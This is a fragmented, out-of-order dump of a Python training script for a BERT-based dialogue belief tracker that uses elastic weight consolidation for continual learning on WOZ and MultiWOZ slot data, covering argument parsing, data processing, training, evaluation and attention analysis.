initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4,", "action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to", "= ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in", "= loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids,", "n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: 
torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss =", "processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of", "enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot = \"price range\"", "x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct =", "on validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot =", "model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p", "step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids,", "All slot value labels num_labels = [len(labels) for labels in label_list] # Number", "#### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for", "reader: if len(line) > 0 and line[0][0] == '#': # ignore comments (starting", "ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do", "help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss", "dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn',", "## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after", "in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology =", "EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model", "processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc ==", "truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100,", "label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id =", "[] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids", "`do_train` or `do_eval` must be True.\") ############################################################################### # Load data ############################################################################### # Get", "labels num_labels = [len(labels) for labels in label_list] # Number of labels of", "1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer =", "i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace('", "print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == 
torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))", "* prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [", "when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int,", "args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot],", "sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if", "line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue", "is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy =", "else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"***", "i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot +=", "tokens_b, max_length): \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\" while", "args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\", "enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]:", "rename rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key", "len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:", "None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return", "label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs),", "for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch)", "text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for", "config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del", "ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model", "dev_acc)) #if epoch > 100 and last_update + args.patience <= epoch: if last_update", "\\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input", "args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers", "and not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be", "x < warmup: return x / warmup return 1.0 - x ############################################################################### #", "args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data,", "for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key]", "text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in", "main(): 
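The real EWC class is not recoverable from the fragments, so the following is an illustrative stand-in, assuming the standard diagonal-Fisher formulation; `DiagonalFisherEWC` and the `loss_fn(model, batch)` callable are hypothetical names, not the original API:

```python
import torch

class DiagonalFisherEWC:
    """Minimal diagonal-Fisher EWC sketch; not the original
    BeliefTrackerSlotQueryMultiSlotEWC implementation."""

    def __init__(self, model, dataloader, loss_fn):
        # Snapshot the parameters learned on the previous task.
        self.star = {n: p.detach().clone()
                     for n, p in model.named_parameters() if p.requires_grad}
        self.fisher = {n: torch.zeros_like(p) for n, p in self.star.items()}
        was_training = model.training
        model.eval()
        n_batches = 0
        for batch in dataloader:
            model.zero_grad()
            loss_fn(model, batch).backward()  # task loss on old-task data
            for n, p in model.named_parameters():
                if p.grad is not None and n in self.fisher:
                    self.fisher[n] += p.grad.detach() ** 2
            n_batches += 1
        for n in self.fisher:
            self.fisher[n] /= max(n_batches, 1)
        model.zero_grad()
        model.train(was_training)

    def penalty(self, model):
        # Quadratic pull toward the old-task optimum, weighted by the
        # (approximate) Fisher information; added to the task loss as
        # loss + lambda_ewc * ewc.penalty(model).
        total = 0.0
        for n, p in model.named_parameters():
            if n in self.fisher:
                total = total + (self.fisher[n] * (p - self.star[n]) ** 2).sum()
        return total
```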
Checkpoint transfer. When `--load_path` points at a model trained on a previous task, the script deletes `slot_lookup` and `value_lookup` entries from the loaded state dict (slots and values differ between tasks), renames legacy `rnn.`-prefixed parameter names to `nbt.`, merges the remainder into a freshly constructed model's `state_dict`, and then rebuilds the lookup tables for the new task with `model.initialize_slot_value_lookup(...)`. The sketch below condenses this step.
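A sketch of that checkpoint surgery, condensed from the fragments' two-pass `del_list` / `rename_list` version into a single loop (the wrapper function name is hypothetical; the key tests and the `'rnn.'` to `'nbt.'` rename are taken from the fragments):

```python
import torch

def load_previous_task_checkpoint(model, load_path, device):
    ptr_model = torch.load(load_path, map_location=device)
    for key in list(ptr_model.keys()):
        if ("slot_lookup" in key) or ("value_lookup" in key):
            # Ontology differs between tasks: lookup tables are rebuilt later
            # via model.initialize_slot_value_lookup(...).
            del ptr_model[key]
        elif "rnn." in key:
            # Legacy naming: rnn.* parameters are now nbt.*
            ptr_model[key.replace("rnn.", "nbt.")] = ptr_model.pop(key)
    state = model.state_dict()
    state.update(ptr_model)  # keep fresh initialization for any missing keys
    model.load_state_dict(state)
    return model.to(device)
```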
Evaluation and analysis. `--do_eval` reloads `pytorch_model.bin`, runs the tracker over both previous-task and target-task slot groups, accumulates per-slot loss and joint accuracy over valid turns, post-processes with `_post_process`, and writes the metrics to a report file in `--output_dir`. `--do_analyze` additionally draws per-slot attention heatmaps with seaborn, dumps mispredicted dialogues to `incorrect_dialog.txt`, and writes per-class accuracies to `per_class_accuracy.txt`. The fragments also expose a genuine bug in the single-example evaluation path: it calls `label_ids.unsuqeeze(0)` and `prev_label_ids.unsuqeeze(0)`, misspellings of `unsqueeze(0)` that would raise an AttributeError at runtime; a corrected version of that block follows.
'0:1:2 or", "or dev_loss < best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")", "pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False,", "if slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot)", "[\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1]", "max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx", "a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list =", "seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate before", "task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task #", "3) else: # Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a)", "= [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len = [0,", "run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\",", "# Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() ==", "else: # The symbol '#' will be replaced with '[SEP]' after tokenization. text_a", "assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx <", "[ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples", "\\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None:", "len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length.", "gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of", "[0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss /", "in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot = \"price", "(args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len,", "= tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if", "[[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)", "## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None,", "args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps))", "def _get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label: i", "epoch: break ############################################################################### # Evaluation 
def convert_examples_to_features(examples, label_list, prev_label_list,
                                 max_seq_length, tokenizer, max_turn_length):
    """Loads a data file into a list of `InputBatch`s."""

    slot_dim = len(label_list)
    prev_slot_dim = len(prev_label_list)

    def _hard_coding_label(label):
        return 'do not care' if label == 'dontcare' else label

    def _get_label(label, label_list):
        label_id = []
        label_info = ''
        label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
        for i, label in enumerate(label):
            label = _hard_coding_label(label)
            label_id.append(label_map[i][label])
            label_info += '%s (id = %d) ' % (label, label_map[i][label])
        return label_id, label_info

    features = []
    prev_dialogue_idx = None
    all_padding = [0] * max_seq_length
    all_padding_len = [0, 0]

    max_turn = 0
    for (ex_index, example) in enumerate(examples):
        if max_turn < int(example.guid.split('-')[2]):
            max_turn = int(example.guid.split('-')[2])
    max_turn_length = min(max_turn + 1, max_turn_length)
    logger.info("max_turn_length = %d" % max_turn_length)

    for (ex_index, example) in enumerate(examples):
        tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
        tokens_b = None
        if example.text_b:
            tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
            # Modifies `tokens_a` and `tokens_b` in place so that the total
            # length is less than the specified length.
            # Account for [CLS], [SEP], [SEP] with "- 3"
            _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
        else:
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens_a) > max_seq_length - 2:
                tokens_a = tokens_a[:(max_seq_length - 2)]

        tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
        input_len = [len(tokens), 0]

        if tokens_b:
            tokens += tokens_b + ["[SEP]"]
            input_len[1] = len(tokens_b) + 1

        input_ids = tokenizer.convert_tokens_to_ids(tokens)

        # Zero-pad up to the sequence length.
        input_ids += [0] * (max_seq_length - len(input_ids))  # Note: padding idx = 0
        assert len(input_ids) == max_seq_length

        label_id, label_info = _get_label(example.label, label_list)
        prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)

        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % example.guid)
            logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
            logger.info("label: " + label_info)
            logger.info("previous label: " + prev_label_info)

        curr_dialogue_idx = example.guid.split('-')[1]
        curr_turn_idx = int(example.guid.split('-')[2])

        if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
            # pad the remaining turns of the previous dialogue
            if prev_turn_idx < max_turn_length:
                features += [InputFeatures(input_ids=all_padding,
                                           input_len=all_padding_len,
                                           label_id=[-1] * slot_dim,
                                           prev_label_id=[-1] * prev_slot_dim)] \
                    * (max_turn_length - prev_turn_idx - 1)
            assert len(features) % max_turn_length == 0

        if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:
            features.append(InputFeatures(input_ids=input_ids,
                                          input_len=input_len,
                                          label_id=label_id,
                                          prev_label_id=prev_label_id))

        prev_dialogue_idx = curr_dialogue_idx
        prev_turn_idx = curr_turn_idx

    if prev_turn_idx < max_turn_length:
        features += [InputFeatures(input_ids=all_padding,
                                   input_len=all_padding_len,
                                   label_id=[-1] * slot_dim,
                                   prev_label_id=[-1] * prev_slot_dim)] \
            * (max_turn_length - prev_turn_idx - 1)
    assert len(features) % max_turn_length == 0

    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_input_len = torch.tensor([f.input_len for f in features], dtype=torch.long)
    all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
    all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)

    # reshape tensors to [batch, turn, word]
    all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
    all_input_len = all_input_len.view(-1, max_turn_length, 2)
    all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
    all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)

    return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids


def get_label_embedding(labels, max_seq_length, tokenizer, device):
    features = []
    for label in labels:
        label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
        label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
        label_len = len(label_token_ids)

        label_padding = [0] * (max_seq_length - len(label_token_ids))
        label_token_ids += label_padding
        assert len(label_token_ids) == max_seq_length

        features.append((label_token_ids, label_len))

    all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
    all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)

    return all_label_token_ids, all_label_len


def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place to the maximum length."""
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()


###############################################################################
# Miscellaneous functions
###############################################################################

def accuracy(out, labels):
    outputs = np.argmax(out, axis=1)
    return np.sum(outputs == labels)


def warmup_linear(x, warmup=0.002):
    if x < warmup:
        return x / warmup
    return 1.0 - x
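
# For example, with warmup=0.1 the learning-rate multiplier ramps up linearly
# during the first 10% of training and then decays linearly:
#   warmup_linear(0.05, 0.1) == 0.5   # halfway through warmup: 0.05 / 0.1
#   warmup_linear(0.50, 0.1) == 0.5   # on the decay side: 1.0 - 0.5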

###############################################################################
# Main
###############################################################################

def main():
    parser = argparse.ArgumentParser()

    ## Required parameters
    parser.add_argument('--data_dir', type=str, required=True,
                        help='location of the data corpus')
    parser.add_argument("--bert_model", default=None, type=str, required=True,
                        help="Bert pre-trained model selected in the list: bert-base-uncased, "
                             "bert-large-uncased, bert-base-cased, bert-large-cased, "
                             "bert-base-multilingual-uncased, bert-base-multilingual-cased, bert-base-chinese.")
    parser.add_argument("--bert_dir", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False,
                        help="The directory of the pretrained BERT model")
    parser.add_argument("--task_name", default=None, type=str, required=True,
                        help="The name of the task to train: bert, bert-gru, bert-lstm, "
                             "bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding")
    parser.add_argument("--output_dir", default=None, type=str, required=True,
                        help="The output directory where the model checkpoints will be written.")
    parser.add_argument('--load_path', type=str, default='',
                        help='pretrained model directory name')
    parser.add_argument("--target_slot", default='', type=str, required=True,
                        help="Target slot idx to train model. ex. '0:1:2' or an excluding slot name 'attraction'")
    parser.add_argument("--prev_slot", default='', type=str, required=True,
                        help="Previously trained slot idx. ex. '0:1:2' or an excluding slot name 'attraction'")
    parser.add_argument("--tf_dir", default='tensorboard', type=str, required=False,
                        help="Tensorboard directory")
    parser.add_argument("--nbt", default='rnn', type=str, required=True,
                        help="nbt type: rnn or transformer or turn")
    parser.add_argument("--fix_utterance_encoder", action='store_true',
                        help="Do not train BERT utterance encoder")

    ## Other parameters
    parser.add_argument("--max_seq_length", default=64, type=int,
                        help="The maximum total input sequence length after WordPiece tokenization. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    parser.add_argument("--max_label_length", default=32, type=int,
                        help="The maximum total label sequence length after WordPiece tokenization. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    parser.add_argument("--max_turn_length", default=22, type=int,
                        help="The maximum total input turn length. \n"
                             "Sequences longer than this will be truncated, and sequences shorter \n"
                             "than this will be padded.")
    parser.add_argument('--hidden_dim', type=int, default=100,
                        help="hidden dimension used in belief tracker")
    parser.add_argument('--num_rnn_layers', type=int, default=1,
                        help="number of RNN layers")
    parser.add_argument('--zero_init_rnn', action='store_true',
                        help="set initial hidden of rnns zero")
    parser.add_argument('--skip_connect', type=str, default=False,
                        help="skip-connection")
    parser.add_argument('--attn_head', type=int, default=4,
                        help="the number of heads in multi-headed attention")
    parser.add_argument("--do_train", action='store_true',
                        help="Whether to run training.")
    parser.add_argument("--do_eval", action='store_true',
                        help="Whether to run eval on the test set.")
    parser.add_argument("--do_analyze", action='store_true',
                        help="Whether to run analysis on the test set.")
    parser.add_argument("--do_lower_case", action='store_true',
                        help="Set this flag if you are using an uncased model.")
    parser.add_argument("--set_label_encoder_trainable", action='store_true',
                        help="Set this flag if you want to set the label encoder trainable. \n"
                             "This option is valid only when using label embeddings. \n")
    parser.add_argument("--distance_metric", type=str, default="cosine",
                        help="The metric for distance between label embeddings: cosine, euclidean.")
    parser.add_argument("--train_batch_size", default=4, type=int,
                        help="Total batch size for training.")
    parser.add_argument("--dev_batch_size", default=1, type=int,
                        help="Total batch size for validation.")
    parser.add_argument("--eval_batch_size", default=16, type=int,
                        help="Total batch size for eval.")
    parser.add_argument("--learning_rate", default=5e-5, type=float,
                        help="The initial learning rate for Adam.")
    parser.add_argument("--num_train_epochs", default=3.0, type=float,
                        help="Total number of training epochs to perform.")
    parser.add_argument("--patience", default=10.0, type=float,
                        help="The number of epochs to allow no further improvement.")
    parser.add_argument("--warmup_proportion", default=0.1, type=float,
                        help="Proportion of training to perform linear learning rate warmup for. "
                             "E.g., 0.1 = 10%% of training.")
    parser.add_argument("--lambda_ewc", default=0.1, type=float,
                        help="Hyper-parameter for EWC")
    parser.add_argument("--no_cuda", action='store_true',
                        help="Whether not to use CUDA when available")
    parser.add_argument("--local_rank", type=int, default=-1,
                        help="local_rank for distributed training on gpus")
    parser.add_argument('--seed', type=int, default=42,
                        help="random seed for initialization")
    parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
                        help="Number of updates steps to accumulate before performing a backward/update pass.")
    parser.add_argument('--fp16', action='store_true',
                        help="Whether to use 16-bit float precision instead of 32-bit")
    parser.add_argument('--loss_scale', type=float, default=0,
                        help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
                             "0 (default value): dynamic loss scaling.\n"
                             "Positive power of 2: static loss scaling value.\n")
    parser.add_argument("--do_not_use_tensorboard", action='store_true',
                        help="Whether not to use tensorboard logging")

    args = parser.parse_args()

    # check output_dir
    if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
        raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
    os.makedirs(args.output_dir, exist_ok=True)

    task_name = args.task_name.lower()

    # Tensorboard logging
    tb_file_name = args.output_dir.split('/')[1]
    if not args.do_not_use_tensorboard:
        summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
    else:
        summary_writer = None

    fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt" % (tb_file_name)))
    logger.addHandler(fileHandler)
    logger.info(args)

    # CUDA setting
    if args.local_rank == -1 or args.no_cuda:
        device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
        n_gpu = torch.cuda.device_count()
    else:
        torch.cuda.set_device(args.local_rank)
        device = torch.device("cuda", args.local_rank)
        n_gpu = 1
        # Initializes the distributed backend which will take care of synchronizing nodes/GPUs
        torch.distributed.init_process_group(backend='nccl')

    logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
        device, n_gpu, bool(args.local_rank != -1), args.fp16))

    if args.gradient_accumulation_steps < 1:
        raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
            args.gradient_accumulation_steps))
    args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)

    # Set the random seed manually for reproducibility.
    random.seed(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if n_gpu > 0:
        torch.cuda.manual_seed_all(args.seed)

    if not args.do_train and not args.do_eval and not args.do_analyze:
        raise ValueError("At least one of `do_train` or `do_eval` must be True.")

    ###############################################################################
    # Load data
    ###############################################################################

    # Get Processor
    processor = Processor(args)
    prev_label_list = processor.get_prev_labels()        # Slot value labels of previous task
    target_label_list = processor.get_labels()           # Slot value labels of present task
    label_list = prev_label_list + target_label_list     # All slot value labels
    num_labels = [len(labels) for labels in label_list]  # Number of labels of all slots

    # prev_slot_id = processor.prev_slot_idx
    # target_slot_id = processor.target_slot_idx  # wrong
    prev_slot_id = list(range(0, len(processor.prev_slot)))                          # List of slots in previous task
    target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))  # List of slots in present task

    # tokenizer
    vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
    if not os.path.exists(vocab_dir):
        raise ValueError("Can't find %s " % vocab_dir)
    tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)

    num_train_steps = None
    accumulation = False

    if args.do_train:
        train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
        dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
        num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
        num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)

        ## Train utterances
        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
            train_examples, target_label_list, prev_label_list,
            args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running training *****")
        logger.info("  Num examples = %d", len(train_examples))
        logger.info("  Batch size = %d", args.train_batch_size)
        logger.info("  Num steps = %d", num_train_steps)

        all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
            = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)

        train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
        if args.local_rank == -1:
            train_sampler = RandomSampler(train_data)
        else:
            train_sampler = DistributedSampler(train_data)
        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)

        ## Dev utterances
        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
            dev_examples, target_label_list, prev_label_list,
            args.max_seq_length, tokenizer, args.max_turn_length)
        logger.info("***** Running validation *****")
        logger.info("  Num examples = %d", len(dev_examples))
        logger.info("  Batch size = %d", args.dev_batch_size)
        logger.info("  Num steps = %d", num_dev_steps)

        all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \
            all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)

        dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
        dev_sampler = SequentialSampler(dev_data)
        dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)

    logger.info("Loaded data!")

    ###############################################################################
    # Build the models
    ###############################################################################

    # Prepare model
    if args.nbt == 'rnn':
        from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
        if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
            raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
    elif args.nbt == 'turn':
        from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
    elif args.nbt == 'transformer':
        from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
        from BeliefTrackerSlotQueryMultiSlotEWC import EWC
    else:
        raise ValueError('nbt type should be either rnn or transformer')

    model = BeliefTracker(args, num_labels, device)
    if args.fp16:
        model.half()
    model.to(device)

    ## Load a pretrained model: needed when slots and values differ
    ## between the training and evaluation
    ptr_model = torch.load(args.load_path, map_location=device)
    del_list = []
    rename_list = []
    for key in ptr_model.keys():
        if ('slot_lookup' in key) or ('value_lookup' in key):  # remove slot_lookup and value_lookup
            del_list.append(key)
        if ('rnn.' in key):  # rename rnn -> nbt
            rename_list.append(key)
    for key in del_list:
        del ptr_model[key]
    for key in rename_list:
        new_key = key.replace('rnn.', 'nbt.')
        ptr_model[new_key] = ptr_model[key]
        del ptr_model[key]

    state = model.state_dict()
    state.update(ptr_model)
    model.load_state_dict(state)
    model.to(device)

    ## Get slot-value embeddings
    label_token_ids, label_len = [], []
    for labels in label_list:
        token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
        label_token_ids.append(token_ids)
        label_len.append(lens)

    ## Get slot-type embeddings
    slot_token_ids, slot_len = \
        get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)

    model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)

    if args.local_rank != -1:
        try:
            from apex.parallel import DistributedDataParallel as DDP
        except ImportError:
            raise ImportError(
                "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
        model = DDP(model)
    elif n_gpu > 1:
        model = torch.nn.DataParallel(model)

    # Prepare optimizer
    if args.do_train:
        def get_optimizer_grouped_parameters(model):
            param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
            no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
            optimizer_grouped_parameters = [
